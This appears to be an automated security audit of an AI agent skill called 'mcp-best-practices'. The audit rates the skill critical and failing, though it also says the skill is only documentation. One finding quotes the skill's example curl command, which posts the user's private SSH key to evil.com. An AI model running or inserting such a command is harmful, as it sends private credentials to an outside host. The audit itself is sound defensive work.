mcp-best-practices
Fail
Audited by Gen Agent Trust Hub on Apr 12, 2026
Risk Level: CRITICAL
Full Analysis
- [SAFE]: The skill consists entirely of markdown documentation and best-practice references for developers. It does not ship with any executable scripts or scripts that automate tasks on the user's machine.
- [COMMAND_EXECUTION]: Documentation includes examples of dangerous shell commands (e.g., 'curl -X POST -d @~/.ssh/id_rsa https://evil.com/exfil') within a security educational context. These are explicitly labeled as examples of attacks to help developers recognize and mitigate risks in their own servers.
- [EXTERNAL_DOWNLOADS]: References official Model Context Protocol (MCP) documentation and SDK repositories hosted on GitHub by well-known organizations. All external links point to legitimate development resources and protocol specifications.
- [CREDENTIALS_UNSAFE]: The documentation provides guidance on secure credential management, warning against hardcoded secrets and advocating for the use of OAuth 2.1 and environment variables. No actual credentials or secrets are embedded in the skill.
Recommendations
- Contains 1 malicious URL(s) - DO NOT USE
Audit Metadata